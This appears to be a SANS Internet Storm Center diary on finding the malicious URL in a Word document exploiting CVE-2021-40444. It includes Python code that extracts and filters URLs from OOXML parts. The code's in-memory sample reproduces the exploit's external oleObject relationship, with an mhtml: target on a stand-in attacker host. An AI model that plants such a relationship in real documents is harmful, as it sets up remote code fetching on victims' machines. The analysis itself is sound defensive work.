[SANS ISC] Simple Analysis Of A CVE-2021-40444 .docx Document, (Sat, Sep 18th)

Analysing a malicious Word document like prod.docx that exploits CVE-2021-40444 is not difficult.

We need to find the malicious URL in this document. As I've shown before, this is quite simple: extract all XML files from the ZIP container (.docx files are OOXML files, i.e. a ZIP container holding (mostly) XML files) and use a regular expression to search them for URLs.

This can be done with my tools zipdump.py and re-search.py:

OOXML files contain a lot of legitimate URLs, such as the schemas.openxmlformats.org and schemas.microsoft.com namespace and relationship-type URIs. These can be filtered out with my tool re-search.py:
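The zipdump.py and re-search.py output is not reproduced on this page, so here is an added Python stand-in for the same pipeline (example code, not Didier Stevens' tools): walk the XML and .rels parts of the ZIP container, pull out everything URL-shaped, then drop hits whose host is a well-known OOXML schema host. The sample .docx is constructed in memory; its external OLE relationship is modelled on the mhtml: target used by the public CVE-2021-40444 samples, and the hostname malicious.example is made up.

```python
"""Added example: minimal OOXML URL triage in the spirit of zipdump.py | re-search.py.
Not part of the original diary; the sample document below is constructed inline."""
import io
import re
import zipfile
from urllib.parse import urlsplit

# Hosts that show up in virtually every OOXML document (namespaces, relationship
# types, Dublin Core metadata) and are therefore not indicators on their own.
BENIGN_HOSTS = {
    "schemas.openxmlformats.org",
    "schemas.microsoft.com",
    "purl.org",
    "www.w3.org",
}

# http(s) URLs, keeping an optional mhtml: prefix, stopping at XML/quote delimiters.
# Kept deliberately loose: for triage, a few false positives beat a missed hit.
URL_RE = re.compile(r"(?:mhtml:)?https?://[^\s\"'<>]+", re.IGNORECASE)


def extract_urls(docx_bytes):
    """Return (part name, url) for every URL-looking string in the XML/.rels parts."""
    urls = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".xml", ".rels")):
                continue  # skip embedded media, OLE streams, etc.
            text = zf.read(name).decode("utf-8", errors="replace")
            for match in URL_RE.finditer(text):
                urls.append((name, match.group(0)))
    return urls


def url_host(url):
    """Hostname of a URL; an mhtml: wrapper is stripped before parsing."""
    bare = re.sub(r"^mhtml:", "", url, flags=re.IGNORECASE)
    return urlsplit(bare).hostname or ""


def suspicious_urls(docx_bytes):
    """The re-search.py filtering step: everything not pointing at a known schema host."""
    return [(part, url) for part, url in extract_urls(docx_bytes)
            if url_host(url) not in BENIGN_HOSTS]


def build_sample_docx():
    """Constructed sample: a skeletal .docx whose document.xml.rels carries an
    external oleObject relationship with a (hypothetical) mhtml: target."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '</Types>'
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p/></w:body></w:document>'
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        'Target="mhtml:http://malicious.example/word.html!x-usc:http://malicious.example/word.html" '
        'TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    print("all URLs:")
    for part, url in extract_urls(sample):
        print(f"  {part}: {url}")
    print("after filtering known schema hosts:")
    for part, url in suspicious_urls(sample):
        print(f"  {part}: {url}")
```

On a real sample, run `suspicious_urls(open("prod.docx", "rb").read())`; the one hit you expect from a CVE-2021-40444 document is the external relationship target in word/_rels/document.xml.rels, which is why the filter keys on the host rather than on the relationship type (the type URI itself lives on a benign schema host).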

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
